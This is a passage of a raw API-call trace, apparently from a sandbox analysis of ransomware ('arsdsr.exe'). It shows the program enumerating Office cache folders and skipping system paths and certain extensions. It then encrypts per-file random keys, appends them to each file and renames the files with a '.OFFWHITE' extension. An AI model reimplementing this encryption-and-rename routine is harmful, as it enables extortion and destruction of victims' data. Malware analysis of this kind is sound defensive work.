lpString2=".mp3") returned 1 [0083.652] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0083.652] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0083.652] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0083.653] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0083.653] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="OutlookMUI.xml", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0083.653] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2=".") returned 1 [0083.653] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="..") returned 1 [0083.653] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="...") returned 1 [0083.653] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="windows") returned -1 [0083.653] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="$recycle.bin") returned 1 [0083.653] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="rsa") returned -1 [0083.653] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="ntuser.dat") returned 1 [0083.653] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="programdata") returned -1 [0083.653] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="appdata") returned 1 [0083.653] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="program files") returned -1 [0083.653] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="program files (x86)") returned -1 [0083.653] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\" [0083.653] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", lpString2="OutlookMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" [0083.653] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0083.653] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0083.654] PathFindExtensionW (pszPath="OutlookMUI.xml") returned=".xml" [0083.654] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0083.654] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0083.654] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0083.654] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0083.654] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0083.654] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0083.654] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0083.654] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0083.654] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0083.654] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0083.654] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0083.654] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0083.654] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0083.654] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0083.654] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0083.654] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0083.670] GetProcessHeap () returned 0x500000 [0083.671] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bb00 [0083.671] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0083.671] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=3186) returned 1 [0083.671] GetProcessHeap () returned 0x500000 [0083.671] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0083.671] GetProcessHeap () returned 0x500000 [0083.671] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0083.671] GetProcessHeap () returned 0x500000 [0083.671] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0083.671] GetProcessHeap () returned 0x500000 [0083.671] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0083.672] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0083.672] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0083.672] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0083.672] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0083.672] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0083.672] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0083.672] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0083.672] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0083.672] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0083.672] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0083.672] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0083.672] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0083.673] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xc72, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.673] SetLastError (dwErrCode=0x0) [0083.673] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0083.811] GetLastError () returned 0x0 [0083.811] GetLastError () returned 0x0 [0083.811] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xd72, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.811] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0083.811] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xe72, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.811] WriteFile (in: hFile=0x21c, lpBuffer=0x52bb00*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52bb00*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0083.811] GetProcessHeap () returned 0x500000 [0083.811] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xc72) returned 0x5517b0 [0083.811] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.811] ReadFile (in: hFile=0x21c, lpBuffer=0x5517b0, nNumberOfBytesToRead=0xc72, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5517b0*, lpNumberOfBytesRead=0x295e540*=0xc72, lpOverlapped=0x0) returned 1 [0083.814] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.814] WriteFile (in: hFile=0x21c, lpBuffer=0x5517b0*, nNumberOfBytesToWrite=0xc72, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5517b0*, lpNumberOfBytesWritten=0x295e54c*=0xc72, lpOverlapped=0x0) returned 1 [0083.814] GetProcessHeap () returned 0x500000 [0083.814] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5517b0 | out: hHeap=0x500000) returned 1 [0083.814] CloseHandle (hObject=0x21c) returned 1 [0083.823] GetProcessHeap () returned 0x500000 [0083.823] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0083.823] GetProcessHeap () returned 0x500000 [0083.823] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0083.823] GetProcessHeap () returned 0x500000 [0083.823] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0083.823] GetProcessHeap () returned 0x500000 [0083.823] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0083.823] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" [0083.823] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.OFFWHITE" [0083.823] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.offwhite")) returned 1 [0083.824] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0083.824] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0083.824] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0083.824] lstrcmpiW (lpString1="Setup.xml", lpString2="...") returned 1 [0083.824] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0083.824] lstrcmpiW (lpString1="Setup.xml", lpString2="$recycle.bin") returned 1 [0083.824] lstrcmpiW (lpString1="Setup.xml", lpString2="rsa") returned 1 [0083.824] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0083.824] lstrcmpiW (lpString1="Setup.xml", lpString2="programdata") returned 1 [0083.825] lstrcmpiW (lpString1="Setup.xml", lpString2="appdata") returned 1 [0083.825] lstrcmpiW (lpString1="Setup.xml", lpString2="program files") returned 1 [0083.825] lstrcmpiW (lpString1="Setup.xml", lpString2="program files (x86)") returned 1 [0083.825] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\" [0083.825] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" [0083.825] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0083.825] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0083.825] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0083.825] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0083.825] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0083.825] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0083.825] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0083.825] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0083.825] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0083.825] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0083.825] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0083.825] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0083.826] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0083.826] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0083.826] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0083.826] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0083.826] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0083.826] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0083.826] lstrcmpiW (lpString1="Setup.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0083.826] GetProcessHeap () returned 0x500000 [0083.826] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52baf0 [0083.826] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0083.834] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=4207) returned 1 [0083.834] GetProcessHeap () returned 0x500000 [0083.834] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0083.834] GetProcessHeap () returned 0x500000 [0083.834] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0083.834] GetProcessHeap () returned 0x500000 [0083.834] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0083.834] GetProcessHeap () returned 0x500000 [0083.834] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0083.834] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0083.835] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0083.835] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0083.835] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0083.835] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0083.835] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0083.835] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0083.835] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0083.835] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0083.835] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0083.835] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0083.835] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0083.836] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x106f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.836] SetLastError (dwErrCode=0x0) [0083.836] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0083.984] GetLastError () returned 0x0 [0083.984] GetLastError () returned 0x0 [0083.984] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x116f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.984] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0083.984] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x126f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.984] WriteFile (in: hFile=0x21c, lpBuffer=0x52baf0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52baf0*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0083.984] GetProcessHeap () returned 0x500000 [0083.984] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x106f) returned 0x5517b0 [0083.984] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.984] ReadFile (in: hFile=0x21c, lpBuffer=0x5517b0, nNumberOfBytesToRead=0x106f, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5517b0*, lpNumberOfBytesRead=0x295e540*=0x106f, lpOverlapped=0x0) returned 1 [0084.011] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.011] WriteFile (in: hFile=0x21c, lpBuffer=0x5517b0*, nNumberOfBytesToWrite=0x106f, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5517b0*, lpNumberOfBytesWritten=0x295e54c*=0x106f, lpOverlapped=0x0) returned 1 [0084.011] GetProcessHeap () returned 0x500000 [0084.011] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5517b0 | out: hHeap=0x500000) returned 1 [0084.011] CloseHandle (hObject=0x21c) returned 1 [0084.023] GetProcessHeap () returned 0x500000 [0084.023] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0084.023] GetProcessHeap () returned 0x500000 [0084.023] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0084.023] GetProcessHeap () returned 0x500000 [0084.023] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0084.023] GetProcessHeap () returned 0x500000 [0084.023] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0084.023] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" [0084.023] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" [0084.023] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.offwhite")) returned 1 [0084.024] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0084.024] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0084.027] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1 [0084.027] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0084.027] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0084.027] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="...") returned 1 [0084.027] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="windows") returned -1 [0084.027] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="$recycle.bin") returned 1 [0084.028] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="rsa") returned -1 [0084.028] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="ntuser.dat") returned -1 [0084.028] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="programdata") returned -1 [0084.028] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="appdata") returned -1 [0084.028] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="program files") returned -1 [0084.028] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="program files (x86)") returned -1 [0084.028] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/MSOCache\\All Users\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0084.028] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\", lpString2="{90140000-001B-0409-1000-0000000FF1CE}-C" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C") returned="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C" [0084.028] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\" [0084.028] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\" [0084.028] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*") returned="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*" [0084.028] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0084.030] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0084.030] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0084.030] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0084.030] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0084.030] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0x340032, 